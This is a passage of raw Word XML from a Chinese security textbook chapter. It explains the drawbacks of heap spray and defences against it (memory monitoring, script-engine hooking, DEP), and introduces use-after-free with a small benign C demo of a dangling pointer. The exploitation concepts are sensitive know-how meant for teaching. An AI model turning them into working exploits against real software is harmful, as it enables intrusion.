        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Spray是堆溢出漏洞利用的一种有效手段，其优点为可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>增加缓冲区溢出攻击的成功率</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>覆盖地址可以简单使用类NOP指令覆盖</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>可以用于堆栈溢出攻击，用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>lidecode覆盖堆栈返回地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41641B10"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但Heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Spray也存在一些缺点，例如Heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Spray</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>会导致被攻击进程的内存占用暴增，容易被</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全软件发现，同时Heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Spray</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>不能用于主动攻击，一般是通过栈溢出利用或者其他漏洞来进行协同攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>如果目的地址被Shellcode覆盖，则Shellcode执行会失败，因此不能保证100%成功</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386EFF5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为防范Heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Spray攻击，可实时监视应用程序使用内存情况，若</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>发现应用程序的内存大量增加（设置阈值），</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>立即检测堆上的数据，看是否包含大量的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>lidecode。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154788BA"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当浏览器的脚本解释器开始重复申请堆的时候，监控模块可以记录堆的大小、内容和数量，如果这些重复 的堆请求到达了一个阀值或者覆盖了指定的地址（譬如0x0C0C0C0C，0x0D0D0D0D等等），监控模块立即阻止脚本的执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7454F74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对于一些利用脚本（Javascript Vbscript Actionscript）的进行Heap Spray攻击的情况，可以通过hook脚本引擎，分析脚本代码，根据一些Heap Spray常见特征，检测是否受到Heap Spray攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。除此之外，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>开启DEP</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保护也是防范Heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Spray攻击的有效方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA0137F"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2.3.5 UAF</w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A18D6C3" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="560"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UAF</w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Use After Free)</w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是堆结构漏洞的一种重要的利用方式，顾名思义，UAF即在free</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后进行利用。内存块被释放后，若其对应的指针没有被设置为NULL，则指向这一块内存的指针称之为野指针或迷途指针、悬空指针。若操作系统将这部分已经释放的内存重新分配给另外一个进程，而原来的程序重新引用现在的野指针，则将产生无法预料的后果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F3D8C5"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由于此时野指针所指向的内存已经完全是不同的数据，若原程序继续往野指针所指向的内存地址写入数据，这些和原程序不相关的数据将被损坏，进而导致不可预料的程序错误。这种类型的程序错误，不容易找到问题的原因，在Linux系统中通常会导致存储器区块错误，在Windows系统中会导致一般保护错误。如果操作系统的内存分配器将已经被覆盖的数据区域再分配，就可能会影响系统的稳定性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CFE6EB" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70DA87AE"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1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UAF原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9414E7"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观察以下代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF28A9A"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mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3719BF61" wp14:editId="71CFCFBE">
                <wp:extent cx="5231081" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="8255" b="0"/>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081" cy="1404620"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5D586640"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代码2</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00937346">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t>.9</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="235796B2"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#include &lt;stdio.h&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="723CDE49"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#include &lt;cstdlib&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="24289C7E"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#include &lt;string.h&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="45085EEC"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int main()</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6D2E52B5"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w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2527D4D4"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char *p1;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="041C9239"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p1 = (char *) malloc(sizeof(char)*10);//申请内存空间</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="572259F1"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memcpy(p1,"hello",10);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5BE14618"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printf("p1 addr:%x,%s\n",p1,p1);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6C4AF4DC"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free(p1);//释放内存空间</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="12A09C94"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char *p2;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="36A38899"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p2 = (char *)malloc(sizeof(char)*10);//二次申请内存空间，与第一次大小相同，申请到了同一块内存</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3ABC1D37"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memcpy(p1,"world",10);//对内存进行修改</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5DB99355"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printf("p2 addr:%x,%s\n",p2,p1);//验证</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3356013E"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return 0;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="057A6771"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w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                        <a:spAutoFit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3719BF61" id="_x0000_s1150" type="#_x0000_t202" style="width:41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WEEwIAAP8DAAAOAAAAZHJzL2Uyb0RvYy54bWysk92O2yAQhe8r9R0Q943tNNlmrTirbbap&#10;Km1/pG0fAGMco2KGDiT29uk74Gw22t5V9QUCDxxmvjmsb8besKNCr8FWvJjlnCkrodF2X/Ef33dv&#10;Vpz5IGwjDFhV8Ufl+c3m9av14Eo1hw5Mo5CRiPXl4CreheDKLPOyU73wM3DKUrAF7EWgJe6zBsVA&#10;6r3J5nl+lQ2AjUOQynv6ezcF+Sbpt62S4WvbehWYqTjlFtKIaazjmG3WotyjcJ2WpzTEP2TRC23p&#10;0rPUnQiCHVD/JdVrieChDTMJfQZtq6VKNVA1Rf6imodOOJVqITjenTH5/ycrvxwf3DdkYXwPIzUw&#10;FeHdPcifnlnYdsLu1S0iDJ0SDV1cRGTZ4Hx5OhpR+9JHkXr4DA01WRwCJKGxxT5SoToZqVMDHs/Q&#10;1RiYpJ/L+dsiXxWcSYoVi3xxNU9tyUT5dNyhDx8V9CxOKo7U1SQvjvc+xHRE+bQl3ubB6GanjUkL&#10;3Ndbg+woyAG79KUKXmwzlg0Vv17Ol0nZQjyfzNHrQA41uq/4Ko/f5JmI44Nt0pYgtJnmlImxJz4R&#10;yQQnjPXIdEP683g48qqheSRiCJMj6QXRpAP8zdlAbqy4/3UQqDgznyxRvy4Wi2jftFgs3xEihpeR&#10;+jIirCSpigfOpuk2JMsnHu6WurPTidtzJqecyWUJ5+lFRBtfrtOu53e7+QMAAP//AwBQSwMEFAAG&#10;AAgAAAAhAIkvWsjbAAAABQEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNyoEyOq&#10;KsSpKiQuqAdaOHDcxkucJrZD7LTh71m40MtKqxnNvCnXs+vFicbYBq8hX2QgyNfBtL7R8P72fLcC&#10;ERN6g33wpOGbIqyr66sSCxPOfkenfWoEh/hYoAab0lBIGWtLDuMiDORZ+wyjw8Tv2Egz4pnDXS9V&#10;li2lw9Zzg8WBnizV3X5yXLKN9bQLX8d828kP2y3x4dW+aH17M28eQSSa078ZfvEZHSpmOoTJmyh6&#10;DTwk/V3WVuqeZxw0KJUrkFUpL+mrHwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAA&#10;EwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/&#10;1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAPZVWE&#10;EwIAAP8DAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCJ&#10;L1rI2wAAAAUBAAAPAAAAAAAAAAAAAAAAAG0EAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADz&#10;AAAAdQUAAAAA&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="5D586640"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代码2</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00937346">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>.9</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="235796B2"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#include &lt;stdio.h&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="723CDE49"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#include &lt;cstdlib&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="24289C7E"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#include &lt;string.h&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="45085EEC"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int main()</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6D2E52B5"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w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2527D4D4"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char *p1;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="041C9239"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p1 = (char *) malloc(sizeof(char)*10);//申请内存空间</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="572259F1"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memcpy(p1,"hello",10);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5BE14618"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printf("p1 addr:%x,%s\n",p1,p1);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6C4AF4DC"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free(p1);//释放内存空间</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="12A09C94"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char *p2;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="36A38899"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p2 = (char *)malloc(sizeof(char)*10);//二次申请内存空间，与第一次大小相同，申请到了同一块内存</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3ABC1D37"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memcpy(p1,"world",10);//对内存进行修改</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5DB99355"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hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve">    printf("p2 addr:%x,%s\n",p2,p1);//验证</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3356013E"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 xml:space="preserve">    return 0;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="057A6771" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00937346" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00937346">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>}</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBC27FD"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执行这段代码，得到如图</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2.21</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示的输出结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2956DA1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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C618E41" wp14:editId="559B328C">
            <wp:extent cx="4222967" cy="1244664"/>
            <wp:effectExtent l="0" t="0" r="635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2967" cy="1244664"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F8B11F"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hint="eastAsia"/>
        </w:rPr>
        <w:t>图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">.21 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.9</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的运行结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AF97C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应用程序调用free()释放内存时，如果内存块小于256KB，内存分配器并不马上将内存块释放回内存，而是将内存块标记为空闲状态，主要原因是供程序下次申请内存使用，当内存分配器中空闲内存量达到一定值时才将空闲内存释放回内核。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495F6D63"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以上代码首先申请了1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节的空间，小于2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>KB，在调用free后，内存分配器不会马上将内存释放回内核，故下次再申请仍然得到这段内存。由于p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在调用free</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并未被赋值为NULL，成为野指针，第二次申请内存时p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向了同一段内存空间，而该内存空间的数据已经被赋为新值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF4479A"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如果攻击者可以操纵p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则在p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向的内存被释放后，程序再次申请内存，由于p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有被赋值为NULL，攻击者可向p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向的内存写入精心构造的Shellcode或采用其他方式改变程序控制流，从而达到攻击的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726BDA93" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EAD2E84"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2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
